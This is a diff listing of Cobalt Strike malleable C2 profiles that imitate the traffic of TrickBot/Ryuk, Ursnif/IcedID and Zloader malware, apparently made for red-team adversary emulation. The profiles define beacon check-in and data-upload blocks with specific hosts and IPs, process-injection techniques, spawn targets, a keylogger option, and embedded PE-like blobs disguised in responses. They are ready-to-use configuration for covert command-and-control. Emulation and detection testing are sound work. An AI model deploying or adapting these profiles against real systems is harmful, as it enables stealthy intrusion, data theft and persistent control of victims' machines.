134 set spawnto_x64 "%windir%\\sysnative\\wscript.exe";
135
136 set obfuscate "false";
137
138 set smartinject "false";
139
140 set amsi_disable "false";
141
142 }
143
144 #used peclone on sample from https://app.any.run/tasks/54fe7d78-91d9-4d45-8b65-7333c2c7d480/
145 stage {
146 set checksum "0";
147 set compile_time "12 Feb 2019 14:33:03";
148 set entry_point "159022";
149 set image_size_x86 "548864";
150 set image_size_x64 "548864";
151 #set name "";
152 set userwx "false";
153 set cleanup "false";
154 set stomppe "false";
155 set obfuscate "false";
156 set rich_header "";
157
158 set sleep_mask "false";
159
160 # set module_x86 "";
161 # set module_x64 "";
162
163 transform-x86 {
164 # prepend "\x90\x90\x90";
165 # strrep "ReflectiveLoader" "6ayBRVW";
166 # strrep "beacon.dll" "uVRWRut";
167 }
168
169 transform-x64 {
170 # prepend "\x90\x90\x90";
171 # strrep "ReflectiveLoader" "6ayBRVW";
172 # strrep "beacon.x64.dll" "uVRWRut";
173 }
174
175 #can set a string in the .rdata section of the beacon dll.
176 #adds a zero-terminated string
177 #string "something";
178
179 #adds a string 'as-is'
180 #data "something";
181
182 #adds a wide (UTF-16LE encoded) string
183 #stringw "IMAGE_SCN_MEM_READ";
184 }
185
186
187 #controls process injection behavior
188 process-inject {
189
190 # set allocator "NtMapViewOfSection";
191
192 # set min_alloc "16700";
193
194 set userwx "false";
195
196 set startrwx "true";
197
198 transform-x86 {
199 # prepend "\x90\x90\x90";
200 }
201 transform-x64 {
202 # prepend "\x90\x90\x90";
203 }
204
205 execute {
206 # CreateThread "ntdll!RtlUserThreadStart";
207 CreateThread;
208 NtQueueApcThread;
209 CreateRemoteThread;
210 RtlCreateUserThread;
211 }
212 }
+382
-0
data/profiles/Crimeware/trick_ryuk.profile less more
0 #trick_ryuk.profile
1 #for CS 4.2, if not then c2lint will not like it.
2 #https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf
3 #https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/
4 #xx0hcd
5
6 ###Global Options###
7 set sample_name "trick_ryuk.profile";
8
9 set sleeptime "5000";
10 set jitter "20";
11 set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
12
13 set host_stage "true";
14
15 ###DNS options###
16 set dns_idle "8.8.8.8";
17 set maxdns "245";
18 set dns_sleep "0";
19 set dns_stager_prepend "";
20 set dns_stager_subhost "";
21 set dns_max_txt "252";
22 set dns_ttl "1";
23
24 ###SMB options###
25 set pipename "ntsvcs##";
26 set pipename_stager "scerpc##";
27
28 ###TCP options###
29 set tcp_port "8000";
30
31 ####SSH options###
32 set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
33 set ssh_pipename "SearchTextHarvester##";
34
35 ###SSL Options###
36
37 #https-certificate {
38 #set keystore "";
39 #set password "";
40 #}
41
42 #https-certificate {
43 # set C "US";
44 # set CN "whatever.com";
45 # set L "California";
46 # set O "whatever LLC.";
47 # set OU "local.org";
48 # set ST "CA";
49 # set validity "365";
50 #}
51
52 #code-signer {
53 #set keystore "your_keystore.jks";
54 #set password "your_password";
55 #set alias "server";
56 #}
57
58 ###HTTP-Config Block###
59 #http-config {
60 # set headers "Server, Content-Type";
61 # header "Content-Type" "text/html;charset=UTF-8";
62 # header "Server" "nginx";
63 #
64 # set trust_x_forwarded_for "false";
65 #}
66
67 ###HTTP-GET Block###
68
69 http-get {
70
71 set uri "/dd05ce3a-a9c9-4018-8252-d579eed1e670.zip";
72
73 client {
74
75 header "Accept" "text/html, application/xhtml+xml, */*";
76 header "Accept-Language" "en-US";
77 header "Host" "23.95.97.59";
78 header "Connection" "Keep-Alive";
79
80
81 metadata {
82
83 base64url;
84 prepend "SESSIONID=";
85 header "Cookie";
86
87 }
88
89 }
90
91 server {
92 header "Server" "Apache";
93 header "Upgrade" "h2,h2c";
94 header "Connection" "Upgrade, Keep-Alive";
95 header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT";
96 header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\"";
97 header "Accept-Ranges" "bytes";
98 header "Vary" "Accept-Encoding,User-Agent";
99 header "Keep-Alive" "timeout=5";
100
101 output {
102
103 netbios;
104
105 prepend "PK.........080..W.3
106 ...1.....InvoiceStatement.lnk.Z_.^G..m.j.....\".....f{...
107 7..464.v7.6M..b.o.m..&.M6.
108 ....\"..E..|..P.(R%.J..A.....'..9g...L>....;..;3g........B..1S..
109 3.........V....v.......|.....>";
110
111 append ".....achor_dns.....";
112
113 print;
114 }
115 }
116 }
117
118 #HTTP-GET VARIANT
119 http-get "get_ryuk" {
120
121 set uri "/files";
122
123 client {
124
125 metadata {
126
127 base64url;
128 prepend "SESSIONID=";
129 header "Cookie";
130
131 }
132
133 }
134
135 server {
136
137 output {
138
139 netbios;
140
141 prepend "";
142
143 append "";
144
145 print;
146 }
147 }
148 }
149
150 ###HTTP-POST VARIANT###
151
152 http-post "post_ryuk" {
153
154 set uri "/id";
155 set verb "GET";
156
157 client {
158
159 output {
160 netbios;
161 parameter "1";
162 }
163 id {
164 base64url;
165 parameter "id";
166
167 }
168 }
169 server {
170 output {
171 netbios;
172 print;
173 }
174 }
175 }
176
177
178 ###HTTP-Post Block###
179
180 http-post {
181
182 set uri "/ono19/ADMIN-DESKTOP.AC3B679F4A22738281E6D7B0C5946E42/81/";
183 #set verb "GET";
184 set verb "POST";
185
186 client {
187
188 header "Accept" "*/*";
189 #header "Host" "";
190 #header "Connection" "close";
191 header "Content-Type" "multipart/form-data; boundary=-----------KMOGEEQTLQTCQMYE";
192
193
194 output {
195 netbios;
196 #prepend "SESSIONID=";
197 #header "COOKIE";
198 prepend "-----------KMOGEEQTLQTCQMYE
199 Content-Disposition: form-data; name=\"data\"
200
201 https://nytimes.com/|Admin|";
202 append "\n-----------KMOGEEQTLQTCQMYE
203 Content-Disposition: form-data; name=\"source\"
204
205 chrome passwords
206 -----------KMOGEEQTLQTCQMYE--";
207
208 print;
209
210 }
211
212 id {
213 base64url;
214 parameter "id";
215
216 }
217 }
218
219 server {
220
221 header "Connection" "close";
222 header "Server" "Cowboy";
223 header "Content-Type" "text/plain";
224
225
226 output {
227 netbios;
228
229 prepend "/1/\n";
230
231 append "";
232
233 print;
234 }
235 }
236 }
237
238 ###HTTP-Stager Block###
239 http-stager {
240
241 set uri_x86 "/dd05ce3a-a9c9-4018-8252-D579eed1e670.zip";
242 set uri_x64 "/Dd05ce3a-a9c9-4018-8252-d579eed1e670.zip";
243
244 client {
245
246 header "Host" "51.254.25.115";
247 header "Connection" "Keep-Alive";
248
249 }
250
251 server {
252
253 header "Server" "Apache";
254 header "Upgrade" "h2,h2c";
255 header "Connection" "Upgrade, Keep-Alive";
256 header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT";
257 header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\"";
258 header "Accept-Ranges" "bytes";
259 header "Vary" "Accept-Encoding,User-Agent";
260 header "Keep-Alive" "timeout=5";
261
262 output {
263
264 print;
265 }
266
267 }
268 }
269
270
271 ###Malleable PE/Stage Block###
272
273 #some options taken from -> https://otx.alienvault.com/indicator/file/7b9526f82448d0a1fb59a8125d1de55e3a166d72
274 stage {
275 set checksum "0";
276 set compile_time "16 Apr 2020 17:56:00";
277 set entry_point "170000";
278 set image_size_x86 "383992";
279 set image_size_x64 "383992";
280 #set name "WWanMM.dll";
281 set userwx "false";
282 set cleanup "false";
283 set sleep_mask "false";
284 set stomppe "false";
285 set obfuscate "false";
286 set rich_header "bd8cf6bfbbaf89f44f2e0189ce41549f4d4c550a712cc5660619e4ac3b4adce9";
287
288 #new 4.2. options
289 #set allocator "HeapAlloc";
290 #set magic_mx_x86 "MZRE";
291 #set magic_mz_x64 "MZAR";
292 #set magic_pe "PE";
293
294 set sleep_mask "false";
295
296 #set module_x86 "wwanmm.dll";
297 #set module_x64 "wwanmm.dll";
298
299 transform-x86 {
300 #prepend "\x90\x90\x90";
301 strrep "ReflectiveLoader" "";
302 strrep "beacon.dll" "";
303 }
304
305 transform-x64 {
306 #prepend "\x90\x90\x90";
307 strrep "ReflectiveLoader" "";
308 strrep "beacon.x64.dll" "";
309 }
310
311 string ",Control_RunDLL \x00";
312 string "start program with cmdline \"%s";
313 string "Global\\fde345tyhoVGYHUJKIOuy";
314 string "get command: incode %s, cmdid \"%s\", cmd \"%s ";
315 string "anchorDNS";
316 string "Anchor_x86";
317 string "Anchor_x64";
318 string "{43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00}";
319 string "{6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00}";
320 string "checkip.amazonaws.com";
321 string "wtfismyip.com";
322 string "{83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}";
323 string "{48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}";
324 string ":\\Anchor\\Win32\\Release\\Anchor_";
325
326 }
327
328 ###Process Inject Block###
329 process-inject {
330
331 #set allocator "NtMapViewOfSection";
332
333 set min_alloc "16700";
334
335 set userwx "false";
336
337 set startrwx "false";
338
339 transform-x86 {
340 #prepend "\x90\x90\x90";
341 }
342 transform-x64 {
343 #prepend "\x90\x90\x90";
344 }
345
346 execute {
347 CreateThread;
348 CreateRemoteThread;
349
350 CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
351
352 SetThreadContext;
353
354 NtQueueApcThread-s;
355
356 #NtQueueApcThread;
357
358 CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
359
360 RtlCreateUserThread;
361 }
362 }
363
364 ###Post-Ex Block###
365 post-ex {
366
367 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
368 set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
369
370 set obfuscate "false";
371
372 set smartinject "false";
373
374 set amsi_disable "false";
375
376 #new 4.2 options
377 set thread_hint "ntdll.dll!RtlUserThreadStart";
378 set pipename "DserNamePipe##";
379 set keylogger "SetWindowsHookEx";
380
381 }
+115
-0
data/profiles/Crimeware/trickbot.profile less more
0 #trickbot
1 #https://community.rsa.com/community/products/netwitness/blog/2017/07/13/necurs-delivers
2 #https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/
3 #xx0hcd
4
5
6 set sleeptime "30000";
7 set jitter "20";
8 set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)";
9 set dns_idle "8.8.8.8";
10 set maxdns "235";
11
12
13 http-get {
14
15 set uri "/";
16
17 client {
18
19 header "Host" "203.150.19.63:443";
20 header "Connection" "Keep-Alive";
21 header "Cache-Control" "no-cache";
22
23
24 metadata {
25 base64url;
26 prepend "D007=";
27 header "Cookie";
28
29
30 }
31
32 }
33
34 server {
35
36 header "Server" "nginx";
37 header "Date" "Fri, 30 Jun 2017 13:08:47 GMT";
38 header "Content-Type" "text/html";
39 header "Connection" "keep-alive";
40
41
42 output {
43 base64url;
44 prepend "<html>
45 <head><title>404 Not Found</title></head>
46 <body bgcolor='white'>
47 <center><h1>404 Not Found</h1></center>
48 <hr><center>nginx</center>
49 </body>
50 </html>
51 <!CDATA['=";
52 append "']>
53 </html>";
54 print;
55 }
56 }
57 }
58
59 http-post {
60
61 set uri "/response.php";
62
63 client {
64
65 header "Content-Type" "multipart/form-data; boundary=----ZMZTCR";
66
67 output {
68 netbios;
69 prepend "----ZMZTCR
70 Content-Disposition: form-data;name='sourcelink' ";
71
72 append " Content-Disposition: form-data;name='sourcequery'
73 ----ZMZTCR";
74 print;
75
76
77
78 }
79
80
81 id {
82 base64url;
83 header "Cookie";
84
85
86 }
87 }
88
89 server {
90
91 header "Server" "nginx";
92 header "Date" "Fri, 30 Jun 2017 13:08:47 GMT";
93 header "Content-Type" "text/html; charset=utf-8";
94 header "Connection" "keep-alive";
95
96
97 output {
98 base64;
99 print;
100 }
101 }
102 }
103
104 http-stager {
105 server {
106 header "Server" "nginx";
107 header "Date" "Fri, 30 Jun 2017 13:08:47 GMT";
108 header "Content-Type" "text/html; charset=utf-8";
109 header "Connection" "keep-alive";
110
111 }
112
113
114 }
+154
-0
data/profiles/Crimeware/ursnif_IcedID.profile less more
0 #ursnif_IcedID malware profile
1 #https://www.malware-traffic-analysis.net/2018/11/08/index.html
2 #xx0hcd
3
4
5 set sleeptime "30000";
6 set jitter "20";
7 set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
8 set dns_idle "8.8.8.8";
9 set maxdns "235";
10 set sample_name "urnif_IcedID profile";
11
12
13 #https-certificate {
14 # set keystore "demo.store";
15 # set password "whateverpass";
16 #}
17
18
19 #prob have to change Host header to something legit depending on testing.
20 http-get {
21
22 set uri "/images/U2gVFoeT1Sh8s/";
23
24 client {
25
26 header "Host" "jititliste.com";
27 header "Accept" "text/html, application/xhtml+xml, */*";
28 header "Accept-Language" "en-US";
29 header "DNT" "1";
30 header "Connection" "Keep-Alive";
31
32
33 metadata {
34 netbios;
35 parameter "id";
36
37 }
38
39 }
40
41 server {
42
43 header "Server" "Apache/2.2.22 (Debian)";
44 header "X-Powered-By" "PHP/5.4.45-0+deb7u14";
45 header "Pragma" "no-cache";
46 header "Set-Cookie" "lang=en; expires=Sat, 08-Dec-2018 15:50:58 GMT; path=/; domain=.jititliste.com; id=";
47 header "Vary" "Accept-Encoding";
48 header "Keep-Alive" "timeout=5, max=100";
49 header "Connection" "Keep-Alive";
50 header "Content-Type" "text/html";
51
52
53
54
55
56 #using newline ("\n") shows as a period (".") in c2lint, but looks correct in wireshark.
57 output {
58
59 netbios;
60 prepend "1faa\n";
61 print;
62
63 }
64 }
65 }
66
67 http-post {
68
69 set verb "GET";
70 set uri "/data2.php";
71
72 client {
73
74 header "Host" "themiole.biz";
75 header "Upgrade" "websocket";
76 header "Connection" "Upgrade";
77
78 output {
79 netbios;
80 prepend "PHPSESSID=";
81 header "Cookie";
82
83
84 }
85
86
87 id {
88 netbios;
89 parameter "";
90
91
92 }
93 }
94
95 server {
96
97 header "Server" "openresty";
98 header "Connection" "upgrade";
99 header "Sec-Websocket-Accept" "Kfh9QIsMVZc16xEPYxPHzW8SZ8w-";
100 header "Upgrade" "websocket";
101
102
103
104 output {
105 netbios;
106 prepend ".";
107 prepend "..NPyo=....\n";
108 append ".......... .......... ..........";
109 print;
110 }
111 }
112 }
113
114 http-stager {
115
116 set uri_x86 "/WES/Fatog.php";
117 set uri_x64 "/WES/fatog.php";
118
119 client {
120 header "Host" "mnesenesse.com";
121 header "Connection" "Keep-Alive";
122 }
123
124 server {
125 header "Server" "Apache/2.2.15 (CentOS)";
126 header "X-Powered-By" "PHP/7.2.11";
127 header "Content-Discription" "File Transfer";
128 header "Content-Disposition" "attachment; filename=\"ledo2.xap\"";
129 header "Content-Type" "application/octet-stream";
130 header "Cache-Control" "must-revalidate";
131 header "Connection" "close";
132
133 }
134
135
136 }
137
138
139 stage {
140 set checksum "0";
141 set compile_time "12 Jun 2018 11:22:23";
142 set image_size_x86 "543900";
143 set image_size_x64 "543900";
144 transform-x86 {
145 strrep "beacon.dll" "";
146 }
147 transform-x64 {
148 strrep "beacon.x64.dll" "aoushdquwe.exe";
149 }
150
151 }
152
153
+364
-0
data/profiles/Crimeware/zloader.profile less more
0 #zloader.profile
1 #https://app.any.run/tasks/7c83ff58-4c40-4a41-958b-d9279b917f2b/
2 #https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/
3
4 #xx0hcd
5
6 ###Global Options###
7 set sample_name "zloader.profile";
8
9 set sleeptime "37500";
10 set jitter "26";
11 set useragent "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36";
12
13 set host_stage "true";
14
15 ###DNS options###
16 set dns_idle "8.8.8.8";
17 set maxdns "245";
18 set dns_sleep "0";
19 set dns_stager_prepend "";
20 set dns_stager_subhost "";
21 set dns_max_txt "252";
22 set dns_ttl "1";
23
24 ###SMB options###
25 set pipename "ntsvcs";
26 set pipename_stager "scerpc";
27
28 ###TCP options###
29 set tcp_port "8000";
30
31 ###SSL Options###
32
33 #https-certificate {
34 #set keystore "";
35 #set password "";
36 #}
37
38 #https-certificate {
39 # set C "US";
40 # set CN "whatever.com";
41 # set L "California";
42 # set O "whatever LLC.";
43 # set OU "local.org";
44 # set ST "CA";
45 # set validity "365";
46 #}
47
48 #code-signer {
49 #set keystore "your_keystore.jks";
50 #set password "your_password";
51 #set alias "server";
52 #}
53
54 ###HTTP-Config Block###
55 #http-config {
56 # set headers "Server, Content-Type";
57 # header "Content-Type" "text/html;charset=UTF-8";
58 # header "Server" "nginx";
59 #
60 # set trust_x_forwarded_for "false";
61 #}
62
63 ###HTTP-GET Block###
64
65 http-get {
66
67 set uri "/wp-content/themes/calliope/wp_data.php";
68
69 client {
70
71 header "Accept" "*/*";
72 header "Host" "wmwifbajxxbcxmucxmlc.com";
73 header "Connection" "Keep-Alive";
74
75
76 metadata {
77
78 base64url;
79 prepend "SESSIONID=";
80 header "Cookie";
81
82 }
83
84 }
85
86 server {
87 header "Server" "nginx";
88 header "Content-Type" "application/x-msdos-program";
89 header "Connection" "close";
90 header "Last-Modified" "Fri, 24 Apr 2020 23:06:05 GMT";
91 header "ETag" "\"76200-5a41168e83140\"";
92 header "Accept-Ranges" "bytes";
93
94 output {
95
96 netbios;
97
98 prepend "MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
99
100 $.......PE..L...$..^...........!................9+....................................................@..................................$..P.......X...............................8...............................@............................................text............................... ..`.rdata..6N.......P..................@[email protected]...`[email protected]............@..............@[email protected]..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................h.........Y.....h.........Y.....h.........Y......D$..V........t V..........^.....D$..T$....H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2.....................D$.;H.u
101 ..;D$.u......2...........4.............QV.t$..D$...........t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^Y.........4.............Q.D$...$....V.t$....u&j..F........F.....h.4......K.....^Y...PV.=.....^Y...........5.............QV.t$..D$......P....t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^[email protected]..^[email protected]..^..........
102 'R.......S...C..V.5 C..+....L$...C...
103 ,R.........+R.....f.D$..P...W.=";
104
105 append "p....D$...C.....C...D$$6....L$..........;.r.(.\"R.....+........@+....C....+.+.........5 C....!...u....C..k..+...U....+....f9T$.w............$R....E.......C..k
106 .C.....v+..C...D$...C...D$..8....D$.+...C.......:.........&R....
107 \"R..........u...C....E......C.........*
108 .C......L$..
109 ,R....@+
110 .C...
111 .C....
112 0R..It6..*t(......t............C.....D$.....:..C... .\\$............u...][email protected]..+\\$....L$.*.....L$..
113 ,R....@+......C...|$ Z...u...
114 (R....+.......5 C...L$...T.
115 ..|$ Z....9u...
116 (R....+.......5 C...D$....@+L$..L$$....L$........=p..._^[...............S.$.U.l$.VW.{...;.......+.9|$..B|$.;.u.../9F........~...F.r...U......j......_..^][.............F.;.s..v.W.A.....tj.{..r....~..r*...(..u..~....r..._.....^][..._..^][..........t.W..+PQ.........~...~.r.....8..._^][.......8._..^][...hd........hd........hT....j...............S.\\$.V....tW.N....r.......;.rE...r........F...;.v1...r..t$.....+.SV.....^[....t$.....+.SV.....^[...W.|$....wz.F.;.s..v...W.!.....t\\.~..r(...&..u..~....r
117 .._.....^[....._^[..........t.WSP.........~...~.r.....8..._^[.......8._..^[...hT....m..................V...L$.W.~.;.r{.T$...+.;.w!.~...N.r
118 .._......^....._^.........tC.~..r.......+.S.....+.t.P...PS.........~...~.[r
119 ....8..._^.......8._..^...hd....................U..j.h@...d.....P...SVW..0..3.P.E.d......e....u..E.........v....'.^..............;.v.......<.+.;.v.......O..E.....3..E...tF...w.Q.........E...u1......E..M..E.@.e.P.E........E..%.....}..E..u..E..]...tH.~..r1.../.u..~..r
120 .6........j..F......F.....j.............t.SQP.........~..r
121 .6.........E.......~..^....r........M.d.
122 ....Y_^[..].......D$.3...t....w.P.,..........t............U...=..........t..M.9.t
123 ....x..u.3.]..@.].U...=,.....(...t..M.9.t
124 ....x..u.3.]..@.].U..V.u...............^]...U..V.u....A...........^]...U..V.u....&...........^]...U..V.u..........(.....^]...................U..V..............E..t.V.I...Y..^]...U..V........E..t.V.*...Y..^]...U.....j..E..E.....P.M..t...h.....E..E.....P.>....U......E..M..E..E.P.!...h.....E..E.....P......U......E..M..E..E.P.....h.....E..E.(...P......;";
125
126 print;
127 }
128 }
129 }
130
131 #HTTP-GET VARIANT
132 http-get "variant_april24dll" {
133
134 set uri "/files/april24.dll";
135
136 client {
137
138 header "Accept" "*/*";
139 header "Host" "wmwifbajxxbcxmucxmlc.com";
140 header "Connection" "Keep-Alive";
141
142
143 metadata {
144
145 base64url;
146 prepend "SESSIONID=";
147 header "Cookie";
148
149 }
150
151 }
152
153 server {
154 header "Server" "nginx";
155 header "Content-Type" "application/x-msdos-program";
156 header "Connection" "close";
157 header "Last-Modified" "Fri, 24 Apr 2020 23:06:05 GMT";
158 header "ETag" "\"76200-5a41168e83140\"";
159 header "Accept-Ranges" "bytes";
160
161 output {
162
163 netbios;
164
165 prepend "MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
166
167 $.......PE..L...$..^...........!................9+....................................................@..................................$..P.......X...............................8...............................@............................................text............................... ..`.rdata..6N.......P..................@[email protected]...`[email protected]............@..............@[email protected]..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................h.........Y.....h.........Y.....h.........Y......D$..V........t V..........^.....D$..T$....H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2.....................D$.;H.u
168 ..;D$.u......2...........4.............QV.t$..D$...........t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^Y.........4.............Q.D$...$....V.t$....u&j..F........F.....h.4......K.....^Y...PV.=.....^Y...........5.............QV.t$..D$......P....t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^[email protected]..^[email protected]..^..........
169 'R.......S...C..V.5 C..+....L$...C...
170 ,R.........+R.....f.D$..P...W.=";
171
172 append "p....D$...C.....C...D$$6....L$..........;.r.(.\"R.....+........@+....C....+.+.........5 C....!...u....C..k..+...U....+....f9T$.w............$R....E.......C..k
173 .C.....v+..C...D$...C...D$..8....D$.+...C.......:.........&R....
174 \"R..........u...C....E......C.........*
175 .C......L$..
176 ,R....@+
177 .C...
178 .C....
179 0R..It6..*t(......t............C.....D$.....:..C... .\\$............u...][email protected]..+\\$....L$.*.....L$..
180 ,R....@+......C...|$ Z...u...
181 (R....+.......5 C...L$...T.
182 ..|$ Z....9u...
183 (R....+.......5 C...D$....@+L$..L$$....L$........=p..._^[...............S.$.U.l$.VW.{...;.......+.9|$..B|$.;.u.../9F........~...F.r...U......j......_..^][.............F.;.s..v.W.A.....tj.{..r....~..r*...(..u..~....r..._.....^][..._..^][..........t.W..+PQ.........~...~.r.....8..._^][.......8._..^][...hd........hd........hT....j...............S.\\$.V....tW.N....r.......;.rE...r........F...;.v1...r..t$.....+.SV.....^[....t$.....+.SV.....^[...W.|$....wz.F.;.s..v...W.!.....t\\.~..r(...&..u..~....r
184 .._.....^[....._^[..........t.WSP.........~...~.r.....8..._^[.......8._..^[...hT....m..................V...L$.W.~.;.r{.T$...+.;.w!.~...N.r
185 .._......^....._^.........tC.~..r.......+.S.....+.t.P...PS.........~...~.[r
186 ....8..._^.......8._..^...hd....................U..j.h@...d.....P...SVW..0..3.P.E.d......e....u..E.........v....'.^..............;.v.......<.+.;.v.......O..E.....3..E...tF...w.Q.........E...u1......E..M..E.@.e.P.E........E..%.....}..E..u..E..]...tH.~..r1.../.u..~..r
187 .6........j..F......F.....j.............t.SQP.........~..r
188 .6.........E.......~..^....r........M.d.
189 ....Y_^[..].......D$.3...t....w.P.,..........t............U...=..........t..M.9.t
190 ....x..u.3.]..@.].U...=,.....(...t..M.9.t
191 ....x..u.3.]..@.].U..V.u...............^]...U..V.u....A...........^]...U..V.u....&...........^]...U..V.u..........(.....^]...................U..V..............E..t.V.I...Y..^]...U..V........E..t.V.*...Y..^]...U.....j..E..E.....P.M..t...h.....E..E.....P.>....U......E..M..E..E.P.!...h.....E..E.....P......U......E..M..E..E.P.....h.....E..E.(...P......;";
192
193 print;
194 }
195 }
196 }
197
198 ###HTTP-Post Block###
199
200 #parameters from a similar sample = https://github.com/tatsui-geek/malware-traffic-analysis.net/blob/master/2016-12-30-Sundown-EK-1st-run-sends-Terdot.A-Zloader.pcap
201 http-post {
202
203 set uri "/post.php";
204 #set verb "GET";
205 set verb "POST";
206
207 client {
208
209 header "Accept" "*/*";
210 header "Cache-Control" "no-cache";
211 header "Host" "wmwifbajxxbcxmucxmlc.com";
212 header "Connection" "close";
213
214
215 output {
216 base64url;
217 parameter "FE8hVs3";
218
219 }
220
221 id {
222 base64url;
223 parameter "id";
224
225 }
226 }
227
228 server {
229
230 header "Server" "nginx";
231 header "Content-Type" "text/html; charset=UTF-8";
232 header "Connection" "close";
233
234 output {
235 netbios;
236
237 prepend "..\"N ......0.9..5......Tb....\"shb.fL.....t....u.......s...D.{...Qv&[email protected]$..y.q,P....Nn~..O .[..Lo..{.Z.....yKd.B..o.M>..J...~n.D0..Bm.:.Tx... [email protected]..!.%...BC.\\I.7C..U..X..D.4....h........'m......gXaQ..<.....X..]...%5.Fx.LO..D._I~.@$.R[..p...<";
238
239 append ">2...........{..\"..~=....._...Nu...s.mm.....u..lV..r......g2)r.w.'G2.*Y.i.,.9...o...t..zhX.h....K=........AS";
240
241 print;
242 }
243 }
244 }
245
246 ###HTTP-Stager Block###
247 http-stager {
248
249 set uri_x86 "/wp-content/themes/wp-front.php";
250 set uri_x64 "/wp-content/themes/wp_data.php";
251
252 client {
253
254 header "Host" "wmwifbajxxbcxmucxmlc.com";
255 header "Connection" "Keep-Alive";
256
257 }
258
259 server {
260
261 header "Server" "nginx";
262 header "Content-Type" "text/html; charset=UTF-8";
263 header "Connection" "close";
264
265 output {
266
267 print;
268 }
269
270 }
271 }
272
273
274 ###Malleable PE/Stage Block###
275
276 #filled this out best I could.
277 stage {
278 set checksum "0";
279 set compile_time "16 Apr 2020 17:56:00";
280 set entry_point "170000";
281 set image_size_x86 "740000";
282 set image_size_x64 "740000";
283 #set name "WWanMM.dll";
284 set userwx "false";
285 set cleanup "false";
286 set sleep_mask "false";
287 set stomppe "false";
288 set obfuscate "false";
289 set rich_header "";
290
291 set sleep_mask "false";
292
293 #set module_x86 "wwanmm.dll";
294 #set module_x64 "wwanmm.dll";
295
296 transform-x86 {
297 #prepend "\x90\x90\x90";
298 strrep "ReflectiveLoader" "";
299 strrep "beacon.dll" "";
300 }
301
302 transform-x64 {
303 #prepend "\x90\x90\x90";
304 strrep "ReflectiveLoader" "";
305 strrep "beacon.x64.dll" "";
306 }
307
308 #from yara strings = https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-03-20-zloader-generic-yara-vk.yar
309 string "{EE 03 00 00 E9 03 00 00 EE 03 00 00 EF 03 00 00 F0 03 00 00 EE 03 00 00 EE 03 00 00 EA 03 00 00 EC 03 00 00 EB 03 00 00 ED 03 00 00}";
310 string "{55 89 e5 53 57 56 8b ?? ?? 85 f6 74 ?? 8b ?? ?? 6a 00 53 e8 ?? ?? ?? ?? 83 c4 08 a8 01 75 ?? 8b ?? ?? ?? ?? ?? 89 f9 e8 ?? ?? ?? ?? 89 c1 0f ?? ?? 66 ?? ?? 66 ?? ?? 74 ?? bb 01 00 00 00 eb ?? 89 d8 99 f7 f9 0f ?? ?? ?? 8b ?? ?? 66 ?? ?? ?? 66 ?? ?? ?? 8d ?? ?? 74 ?? 8d ?? ?? 66 83 fa 5f 72 ?? 66 83 f8 0d 77 ?? ba 00 26 00 00 0f a3 c2 72 ?? eb ?? 31 f6 eb ?? 89 de eb ?? 8b ?? ?? 89 f0 5e 5f 5b 5d c3}
311 ";
312
313 }
314
315 ###Process Inject Block###
316 process-inject {
317
318 #set allocator "NtMapViewOfSection";
319
320 set min_alloc "16700";
321
322 set userwx "false";
323
324 set startrwx "false";
325
326 transform-x86 {
327 #prepend "\x90\x90\x90";
328 }
329 transform-x64 {
330 #prepend "\x90\x90\x90";
331 }
332
333 execute {
334 CreateThread;
335 CreateRemoteThread;
336
337 CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
338
339 SetThreadContext;
340
341 NtQueueApcThread-s;
342
343 #NtQueueApcThread;
344
345 CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
346
347 RtlCreateUserThread;
348 }
349 }
350
351 ###Post-Ex Block###
352 post-ex {
353
354 set spawnto_x86 "%windir%\\syswow64\\explorer.exe";
355 set spawnto_x64 "%windir%\\sysnative\\explorer.exe";
356
357 set obfuscate "false";
358
359 set smartinject "false";
360
361 set amsi_disable "false";
362
363 }
+591
-0
data/profiles/Normal/bing_maps.profile less more
0 #bing maps profile
1 #xx0hcd
2
3 ###Global Options###
4 set sample_name "bing_maps.profile";
5
6 set sleeptime "38500";
7 set jitter "27";
8 set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36";
9
